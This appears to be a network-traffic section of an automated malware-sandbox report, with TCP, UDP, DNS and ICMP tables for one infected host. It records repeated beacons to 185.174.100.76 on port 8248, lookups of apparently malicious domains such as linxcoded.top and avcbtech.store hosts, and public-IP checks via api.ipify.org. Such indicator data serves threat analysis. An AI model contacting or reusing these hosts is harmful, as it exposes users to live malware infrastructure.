Mar 25, 2025 17:15:19.332145929 CET	443	49797	104.26.12.205	192.168.2.4
Mar 25, 2025 17:15:19.557739019 CET	443	49796	104.168.138.190	192.168.2.4
Mar 25, 2025 17:15:19.557939053 CET	443	49796	104.168.138.190	192.168.2.4
Mar 25, 2025 17:15:19.558013916 CET	49796	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:15:19.573780060 CET	49796	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:15:19.573798895 CET	443	49796	104.168.138.190	192.168.2.4
Mar 25, 2025 17:15:21.822141886 CET	49779	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:21.984477043 CET	8248	49779	185.174.100.76	192.168.2.4
Mar 25, 2025 17:15:26.883275032 CET	443	49709	131.253.33.254	192.168.2.4
Mar 25, 2025 17:15:27.366662979 CET	443	49742	204.79.197.222	192.168.2.4
Mar 25, 2025 17:15:27.366776943 CET	49742	443	192.168.2.4	204.79.197.222
Mar 25, 2025 17:15:36.197554111 CET	49758	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:36.363248110 CET	8248	49758	185.174.100.76	192.168.2.4
Mar 25, 2025 17:15:45.854234934 CET	49746	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:46.009434938 CET	8248	49746	185.174.100.76	192.168.2.4
Mar 25, 2025 17:15:52.180357933 CET	49788	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:52.339854002 CET	8248	49788	185.174.100.76	192.168.2.4
Mar 25, 2025 17:15:52.839050055 CET	49749	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:52.998857975 CET	8248	49749	185.174.100.76	192.168.2.4
Mar 25, 2025 17:15:58.055955887 CET	49770	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:15:58.219625950 CET	8248	49770	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:04.057240963 CET	49794	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:04.213958979 CET	8248	49794	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:06.984623909 CET	49779	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.150471926 CET	8248	49779	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:07.173600912 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:07.173635006 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:07.173702955 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:07.173996925 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:07.174009085 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:07.175331116 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.343600988 CET	8248	49799	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:07.343740940 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.344002962 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.504065990 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:07.504513979 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:07.504537106 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:07.504720926 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:07.504725933 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:07.512988091 CET	8248	49799	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:07.513267040 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.513833046 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.682008982 CET	8248	49799	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:07.682065964 CET	8248	49799	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:07.723912001 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:07.827780962 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:07.827825069 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:07.827944994 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:07.828176975 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:07.828191996 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.054832935 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.055260897 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.055288076 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.055493116 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.055501938 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.106611967 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.106699944 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.106775999 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.108663082 CET	49798	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.108680010 CET	443	49798	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.112406015 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.112442017 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.112509012 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.112746954 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.112760067 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.312387943 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.312470913 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.312520027 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.316327095 CET	49800	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.316342115 CET	443	49800	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.328280926 CET	49799	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:08.331939936 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.331985950 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.332061052 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.332197905 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.332215071 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.428877115 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.429244995 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.429274082 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.429594040 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.429601908 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.536036968 CET	8248	49799	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:08.551367998 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.552023888 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.552045107 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.552246094 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.552251101 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.817961931 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.818042040 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.818259001 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.819251060 CET	49802	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:08.819264889 CET	443	49802	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:08.932632923 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.932702065 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:08.932873964 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.933273077 CET	49801	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:08.933281898 CET	443	49801	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.016841888 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.016879082 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.016958952 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.018114090 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.018757105 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.018770933 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.179991007 CET	8248	49804	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:16.180155039 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.180480003 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.338756084 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.339332104 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.339371920 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.339531898 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.339539051 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.341588974 CET	8248	49804	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:16.341778994 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.342008114 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.505073071 CET	8248	49804	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:16.505137920 CET	8248	49804	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:16.508971930 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:16.509020090 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.509129047 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:16.509325027 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:16.509341955 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.546206951 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:16.732726097 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.733156919 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:16.733186007 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.733408928 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:16.733416080 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.824431896 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.824508905 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.824671984 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.826131105 CET	49803	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.826162100 CET	443	49803	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.856921911 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.856987953 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.857127905 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.857285976 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:16.857301950 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:16.996428967 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.996515989 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:16.996604919 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:17.132669926 CET	49805	443	192.168.2.4	104.26.12.205
Mar 25, 2025 17:16:17.132704020 CET	443	49805	104.26.12.205	192.168.2.4
Mar 25, 2025 17:16:17.134099007 CET	49804	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:17.175391912 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.175698042 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:17.175724030 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.175898075 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:17.175903082 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.276623964 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.276676893 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.276753902 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.277224064 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.277241945 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.335505009 CET	8248	49804	185.174.100.76	192.168.2.4
Mar 25, 2025 17:16:17.488688946 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.489234924 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.489272118 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.489450932 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.489459038 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.648674965 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.648750067 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.648809910 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:17.649760962 CET	49806	443	192.168.2.4	104.168.138.190
Mar 25, 2025 17:16:17.649784088 CET	443	49806	104.168.138.190	192.168.2.4
Mar 25, 2025 17:16:17.755029917 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.755100012 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:17.755256891 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.756273031 CET	49807	443	192.168.2.4	104.26.13.205
Mar 25, 2025 17:16:17.756292105 CET	443	49807	104.26.13.205	192.168.2.4
Mar 25, 2025 17:16:21.367058992 CET	49758	8248	192.168.2.4	185.174.100.76
Mar 25, 2025 17:16:21.536576033 CET	8248	49758	185.174.100.76	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 17:13:05.085855007 CET	53	54385	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:05.117208958 CET	53	59467	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:05.918098927 CET	53	62911	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:07.481123924 CET	60756	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:07.481475115 CET	53761	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:07.587711096 CET	53	60756	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:07.587771893 CET	53	53761	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:09.930435896 CET	64639	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:09.930565119 CET	63402	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:10.134440899 CET	53	63402	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:10.153467894 CET	53	64639	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:11.464859009 CET	49929	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:11.465276957 CET	53426	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:11.765117884 CET	53	49929	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:11.776278973 CET	53	53426	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:13.395152092 CET	53	62850	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:14.109582901 CET	59548	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:14.109903097 CET	60547	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:14.216305971 CET	53	59548	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:14.237966061 CET	53	60547	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:14.838521957 CET	63507	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:14.838747025 CET	59260	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:14.947000027 CET	53	59260	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:14.949127913 CET	53	63507	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:15.514058113 CET	57078	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:15.514228106 CET	61912	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:15.619530916 CET	53	57078	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:15.630778074 CET	53	61912	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:23.243038893 CET	53	55525	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:28.850707054 CET	53117	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:28.850826979 CET	62419	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:29.163206100 CET	53	53117	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:29.247596979 CET	53	62419	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:29.713249922 CET	59611	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:29.713645935 CET	58318	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:29.817800999 CET	53	59611	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:29.819534063 CET	53	58318	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:30.309685946 CET	58162	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:30.309685946 CET	62374	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:30.415992975 CET	53	62374	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:30.418500900 CET	53	58162	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:36.280051947 CET	58733	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:36.280239105 CET	51824	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:36.627645969 CET	53	51824	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:36.688404083 CET	53	58733	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:42.101810932 CET	53	51811	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:48.702053070 CET	49215	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:48.702193975 CET	50759	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:13:49.062630892 CET	53	49215	1.1.1.1	192.168.2.4
Mar 25, 2025 17:13:49.079948902 CET	53	50759	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:03.186211109 CET	53	54515	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:04.873613119 CET	53	56229	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:05.892404079 CET	53	65333	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:13.836572886 CET	138	138	192.168.2.4	192.168.2.255
Mar 25, 2025 17:14:35.643233061 CET	53	57044	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:36.000009060 CET	52064	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:14:36.000796080 CET	52262	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:14:36.109106064 CET	53	52064	1.1.1.1	192.168.2.4
Mar 25, 2025 17:14:36.111584902 CET	53	52262	1.1.1.1	192.168.2.4
Mar 25, 2025 17:15:06.973606110 CET	54793	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:15:06.973747015 CET	55859	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:15:07.078385115 CET	53	54793	1.1.1.1	192.168.2.4
Mar 25, 2025 17:15:07.078635931 CET	53	55859	1.1.1.1	192.168.2.4
Mar 25, 2025 17:15:19.725200891 CET	53	64209	1.1.1.1	192.168.2.4
Mar 25, 2025 17:16:07.691083908 CET	65282	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:16:07.691382885 CET	53629	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:16:07.798269987 CET	53	65282	1.1.1.1	192.168.2.4
Mar 25, 2025 17:16:07.798288107 CET	53	53629	1.1.1.1	192.168.2.4
Mar 25, 2025 17:16:17.168414116 CET	57656	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:16:17.169704914 CET	64240	53	192.168.2.4	1.1.1.1
Mar 25, 2025 17:16:17.272516012 CET	53	57656	1.1.1.1	192.168.2.4
Mar 25, 2025 17:16:17.275546074 CET	53	64240	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 25, 2025 17:13:29.247704983 CET	192.168.2.4	1.1.1.1	c23e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 17:13:07.481123924 CET	192.168.2.4	1.1.1.1	0x6c16	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:07.481475115 CET	192.168.2.4	1.1.1.1	0x8f10	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 25, 2025 17:13:09.930435896 CET	192.168.2.4	1.1.1.1	0xddc9	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:09.930565119 CET	192.168.2.4	1.1.1.1	0xa805	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 25, 2025 17:13:11.464859009 CET	192.168.2.4	1.1.1.1	0x9a59	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:11.465276957 CET	192.168.2.4	1.1.1.1	0x8ff7	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 25, 2025 17:13:14.109582901 CET	192.168.2.4	1.1.1.1	0xcce2	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.109903097 CET	192.168.2.4	1.1.1.1	0xf126	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 25, 2025 17:13:14.838521957 CET	192.168.2.4	1.1.1.1	0x6e11	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.838747025 CET	192.168.2.4	1.1.1.1	0xe183	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 25, 2025 17:13:15.514058113 CET	192.168.2.4	1.1.1.1	0x9c9	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:15.514228106 CET	192.168.2.4	1.1.1.1	0x1bdf	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 25, 2025 17:13:28.850707054 CET	192.168.2.4	1.1.1.1	0x6c9a	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:28.850826979 CET	192.168.2.4	1.1.1.1	0x9095	Standard query (0)	_8248._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 25, 2025 17:13:29.713249922 CET	192.168.2.4	1.1.1.1	0x1326	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:29.713645935 CET	192.168.2.4	1.1.1.1	0x3823	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 25, 2025 17:13:30.309685946 CET	192.168.2.4	1.1.1.1	0x12bb	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:30.309685946 CET	192.168.2.4	1.1.1.1	0x5c0b	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 25, 2025 17:13:36.280051947 CET	192.168.2.4	1.1.1.1	0x6e60	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:36.280239105 CET	192.168.2.4	1.1.1.1	0x84c0	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 25, 2025 17:13:48.702053070 CET	192.168.2.4	1.1.1.1	0xd5d1	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:48.702193975 CET	192.168.2.4	1.1.1.1	0x3f25	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 25, 2025 17:14:36.000009060 CET	192.168.2.4	1.1.1.1	0xa760	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:14:36.000796080 CET	192.168.2.4	1.1.1.1	0x8bc1	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 25, 2025 17:15:06.973606110 CET	192.168.2.4	1.1.1.1	0xfc71	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:15:06.973747015 CET	192.168.2.4	1.1.1.1	0xe947	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 25, 2025 17:16:07.691083908 CET	192.168.2.4	1.1.1.1	0xac13	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:07.691382885 CET	192.168.2.4	1.1.1.1	0xe6ae	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 25, 2025 17:16:17.168414116 CET	192.168.2.4	1.1.1.1	0xf4c5	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:17.169704914 CET	192.168.2.4	1.1.1.1	0xf28c	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 17:13:07.587711096 CET	1.1.1.1	192.168.2.4	0x6c16	No error (0)	www.google.com		142.250.80.68	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:07.587771893 CET	1.1.1.1	192.168.2.4	0x8f10	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 25, 2025 17:13:10.153467894 CET	1.1.1.1	192.168.2.4	0xddc9	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:11.765117884 CET	1.1.1.1	192.168.2.4	0x9a59	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.216305971 CET	1.1.1.1	192.168.2.4	0xcce2	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.216305971 CET	1.1.1.1	192.168.2.4	0xcce2	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.216305971 CET	1.1.1.1	192.168.2.4	0xcce2	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.216305971 CET	1.1.1.1	192.168.2.4	0xcce2	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.945986986 CET	1.1.1.1	192.168.2.4	0x7f6c	No error (0)	shed.dual-low.s-part-0041.t-0009.t-msedge.net	s-part-0041.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 25, 2025 17:13:14.945986986 CET	1.1.1.1	192.168.2.4	0x7f6c	No error (0)	s-part-0041.t-0009.t-msedge.net		13.107.246.69	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.947000027 CET	1.1.1.1	192.168.2.4	0xe183	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 25, 2025 17:13:14.949127913 CET	1.1.1.1	192.168.2.4	0x6e11	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 25, 2025 17:13:14.949127913 CET	1.1.1.1	192.168.2.4	0x6e11	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:14.949127913 CET	1.1.1.1	192.168.2.4	0x6e11	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:15.619530916 CET	1.1.1.1	192.168.2.4	0x9c9	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 25, 2025 17:13:15.619530916 CET	1.1.1.1	192.168.2.4	0x9c9	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:15.619530916 CET	1.1.1.1	192.168.2.4	0x9c9	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:15.630767107 CET	1.1.1.1	192.168.2.4	0x7825	No error (0)	shed.dual-low.s-part-0010.t-0009.t-msedge.net	s-part-0010.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
